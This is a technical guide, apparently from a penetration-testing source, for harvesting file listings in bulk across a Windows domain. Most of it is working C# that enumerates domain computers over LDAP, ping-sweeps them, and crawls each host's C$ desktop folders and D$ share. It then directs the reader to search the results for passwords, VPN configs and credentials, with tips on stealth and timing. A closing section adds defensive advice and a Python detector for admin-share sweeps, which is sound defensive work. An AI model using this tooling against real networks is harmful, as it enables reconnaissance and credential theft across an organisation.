Batch Collection of Sensitive Files Inside a Domain
Word count: 688 · 2025-08-26 22:11:28
Technical Guide: Batch Collection of Sensitive Files Inside a Domain
Overview
This document describes a method for collecting sensitive files in bulk from a Windows domain environment, aimed in particular at situations where the Linux hosts expose only an SSH port or cannot be entered through ordinary web penetration. With an automated tool, desktop files on domain machines can be gathered efficiently, avoiding the high cost of checking each host by hand.
Implementation Steps
0x01 Batch-Enumerate Domain Machine Names
Method 1: the net command
net group "domain computers" /do
Drawback: the output prints three machine names per row, so the whitespace has to be post-processed.
Method 2: LDAP query (recommended)
using System;
using System.DirectoryServices;

public static class LdapConn {
    public static DirectoryEntry conn = null;
    public static DirectorySearcher search = null;

    // Bind to the domain controller and print the cn of every computer object
    public static void ListComputers(string ip, string username, string password) {
        string url = "LDAP://" + ip;
        conn = new DirectoryEntry(url, username, password);
        search = new DirectorySearcher(conn);
        search.Filter = "(&(objectClass=computer))";
        foreach (SearchResult r in search.FindAll()) {
            string computername = r.Properties["cn"][0].ToString();
            Console.WriteLine(computername);
        }
    }
}
0x02 Host Liveness Detection
- Save the collected machine names to machine.txt and read it line by line:
using System;
using System.IO;

using (StreamReader machine_name = new StreamReader(@"machine.txt")) {
    while (!machine_name.EndOfStream) {
        string machine = machine_name.ReadLine();
        Console.WriteLine(machine);
    }
}
- Use Ping to check whether a machine is up:
using System;
using System.Net.NetworkInformation;
using System.Text;

public static bool IsMachineUp(string hostName) {
    bool retVal = false;
    try {
        Ping pingSender = new Ping();
        PingOptions options = new PingOptions();
        options.DontFragment = true;
        string data = "aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"; // 32-byte payload
        byte[] buffer = Encoding.ASCII.GetBytes(data);
        int timeout = 800; // milliseconds
        PingReply reply = pingSender.Send(hostName, timeout, buffer, options);
        if (reply.Status == IPStatus.Success) {
            retVal = true;
        }
    } catch (Exception) {
        // name resolution or socket failure: treat the host as down
        retVal = false;
    }
    return retVal;
}
- Combine name reading with the liveness check:
StreamReader machine_name = new StreamReader(@"machine.txt");
while (!machine_name.EndOfStream) {
    try {
        string machine = machine_name.ReadLine();
        if (IsMachineUp(machine)) {
            // follow-up actions for a live host
        }
    } catch {
        // exception handling: skip this host and continue
    }
}
machine_name.Close();
0x03 Collecting Desktop Files
Directory layout:
TargetDesktopinfos
├── Machine1
│   ├── UserA
│   │   └── desktop.txt
│   └── UserB
│       └── desktop.txt
└── Machine2
    ├── UserC
    │   └── desktop.txt
    └── UserD
        └── desktop.txt
Implementation steps:
- Create the results directory:
using System.IO;

string currentpath = Directory.GetCurrentDirectory();
string DesktopFiles = Path.Combine(currentpath, "TargetDesktopinfos");
Directory.CreateDirectory(DesktopFiles);
- Get the target machine's user directories (the share must be checked before it is enumerated, and the UNC prefix is required):
string userpath = @"\\" + machine + @"\c$\users";
if (Directory.Exists(userpath)) {
    var user_list = Directory.EnumerateDirectories(userpath);
    // create a folder named after the machine
    string MachineFolder = Path.Combine(DesktopFiles, machine);
    Directory.CreateDirectory(MachineFolder);
    // per-user processing continues below
}
- Iterate over the user directories and process the desktop files:
foreach (string user in user_list) {
    string DesktopDirectoryPath = Path.Combine(user, "Desktop");
    // last path segment is the profile folder name (replaces the article's custom substring() helper)
    string username = Path.GetFileName(user);
    if (Directory.Exists(DesktopDirectoryPath)) {
        // create a folder named after the user
        string UserFolder = Path.Combine(MachineFolder, username);
        Directory.CreateDirectory(UserFolder);
        // create desktop.txt
        string Desktoptxt = Path.Combine(UserFolder, "desktop.txt");
        File.CreateText(Desktoptxt).Close();
        // list every entry on the desktop, including subdirectories
        string[] AllFiles = Directory.GetFileSystemEntries(
            DesktopDirectoryPath,
            "*",
            SearchOption.AllDirectories
        );
        foreach (string file in AllFiles) {
            string create_time = File.GetCreationTime(file).ToString();
            string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
            File.AppendAllText(Desktoptxt, writeFileTo);
        }
    }
}
0x04 Collecting D: Drive Files (Extension)
using System;
using System.IO;

public static void D() {
    try {
        string currentpath = Directory.GetCurrentDirectory();
        string DFiles = Path.Combine(currentpath, "DInfos");
        Directory.CreateDirectory(DFiles);
        StreamReader machine_name = new StreamReader(@"machine.txt");
        while (!machine_name.EndOfStream) {
            try {
                string machine = machine_name.ReadLine();
                if (IsMachineUp(machine)) {
                    string dpath = @"\\" + machine + @"\d$";
                    // verify the share exists before enumerating it
                    if (Directory.Exists(dpath)) {
                        string MachineFolder = Path.Combine(DFiles, machine);
                        Directory.CreateDirectory(MachineFolder);
                        string E_txt = Path.Combine(MachineFolder, "dFiles.txt");
                        File.CreateText(E_txt).Close();
                        try {
                            // files in the D: root
                            var files = Directory.GetFiles(dpath);
                            foreach (string file in files) {
                                string create_time = File.GetCreationTime(file).ToString();
                                string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
                                File.AppendAllText(E_txt, writeFileTo);
                            }
                            // subdirectories of D:, skipping the system restore folder
                            var directories = Directory.EnumerateDirectories(dpath);
                            foreach (string directory in directories) {
                                if (!directory.Contains("System Volume Information")) {
                                    string[] AllFiles = Directory.GetFileSystemEntries(
                                        directory,
                                        "*",
                                        SearchOption.AllDirectories
                                    );
                                    foreach (string file in AllFiles) {
                                        string create_time = File.GetCreationTime(file).ToString();
                                        string writeFileTo = "create time:" + create_time + " " + file + "\r\n";
                                        File.AppendAllText(E_txt, writeFileTo);
                                    }
                                }
                            }
                        } catch (UnauthorizedAccessException) {
                            // insufficient permissions on part of the tree
                        }
                    }
                }
            } catch {
                // per-machine failure: move on to the next host
            }
        }
        machine_name.Close();
    } catch {
        // machine.txt could not be read
    }
}
Using the Results
Once collection finishes, search the generated directory tree for sensitive keywords such as:
- password
- vpn
- credentials
- secret
- config
Notes
- Permissions: the domain user running this must have enough rights to access the target machines' C$ (and D$) shares
- Network restrictions: make sure network policy allows ICMP (Ping) and SMB access
- Timing: IT workstations may be powered off outside working hours, so run this during the working day
- Stealth: large-scale file access may trigger security alerts
- Exception handling: the code should handle every failure case properly (insufficient permissions, missing paths, and so on)
Defensive Recommendations
- Restrict access permissions on shared directories
- Monitor for anomalous large-scale file access
- Apply the principle of least privilege
- Audit domain account permissions regularly
- Enable and monitor SMB access logging
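The second and last recommendations above can be turned into a concrete check. Windows Security event 5140 ("A network share object was accessed") is logged on the target host whenever a share is opened, once the "Audit File Share" subcategory is enabled; the sweep described in this article produces a burst of 5140 events for C$ or D$ from one account and one source IP against many different hosts. The detector below groups forwarded 5140 records by (account, source IP) and alerts when one pair reaches a threshold of distinct target hosts inside a sliding time window. This is an added example, not code from the original article: field names follow the real 5140 schema, but the records are constructed sample data and the ten-minute window and five-host threshold are assumed tuning values.

```python
"""Flag accounts that open admin shares (C$/D$/ADMIN$) on many hosts in a short window.

Added example for the detection recommendation; not part of the original article.
Input records mimic Windows Security event 5140 (TimeCreated, Computer,
SubjectUserName, IpAddress, ShareName). The sample data is constructed and the
window / host_threshold defaults are assumed tuning values.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Administrative shares; 5140 reports ShareName in the \\*\C$ form.
ADMIN_SHARES = {r"\\*\C$", r"\\*\D$", r"\\*\ADMIN$"}


def event(time, computer, user, ip, share):
    """Build one 5140-style record (constructed sample data)."""
    return {"TimeCreated": time, "Computer": computer,
            "SubjectUserName": user, "IpAddress": ip, "ShareName": share}


# Constructed sample: one account sweeps C$ on seven workstations in six minutes,
# a normal user opens a departmental share plus a single C$, and an admin touches
# ADMIN$ on three servers spread over two hours.
SAMPLE_EVENTS = (
    [event(f"2025-08-26T10:0{i}:30", f"WS0{i + 1}", "svc_backup", "10.0.0.5", r"\\*\C$")
     for i in range(7)]
    + [event("2025-08-26T10:02:10", "FS01", "jdoe", "10.0.0.21", r"\\*\Finance"),
       event("2025-08-26T10:04:45", "WS03", "jdoe", "10.0.0.21", r"\\*\C$")]
    + [event(f"2025-08-26T{8 + i:02d}:15:00", f"SRV0{i + 1}", "itadmin", "10.0.0.9", r"\\*\ADMIN$")
       for i in range(3)]
)


def detect_share_sweeps(events, window=timedelta(minutes=10), host_threshold=5):
    """Return one alert per (account, source IP) whose admin-share accesses reach
    host_threshold distinct target hosts inside any sliding window of `window`."""
    by_source = defaultdict(list)
    for ev in events:
        if ev["ShareName"] in ADMIN_SHARES:
            ts = datetime.fromisoformat(ev["TimeCreated"])
            by_source[(ev["SubjectUserName"], ev["IpAddress"])].append((ts, ev["Computer"]))

    alerts = []
    for (user, ip), hits in by_source.items():
        hits.sort()
        start, best = 0, None
        for end in range(len(hits)):
            # shrink the window from the left until it spans at most `window`
            while hits[end][0] - hits[start][0] > window:
                start += 1
            hosts = {host for _, host in hits[start:end + 1]}
            if len(hosts) >= host_threshold and (best is None or len(hosts) > best["distinct_hosts"]):
                best = {"user": user, "source_ip": ip, "distinct_hosts": len(hosts),
                        "window_start": hits[start][0].isoformat(),
                        "window_end": hits[end][0].isoformat()}
        if best is not None:
            alerts.append(best)
    return alerts


if __name__ == "__main__":
    for alert in detect_share_sweeps(SAMPLE_EVENTS):
        print(alert)
```

On the sample data only svc_backup from 10.0.0.5 is reported (seven hosts between 10:00:30 and 10:06:30); jdoe's single C$ access and itadmin's slow ADMIN$ touches stay below the threshold. Because 5140 is written on each target host, the check only works once those hosts forward their Security logs to a central collector, and the threshold should be tuned against the legitimate tools (backup agents, inventory scanners) that open C$ across the fleet.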
With the methods above, sensitive files can be collected in bulk across a domain environment efficiently, providing valuable information for subsequent penetration testing.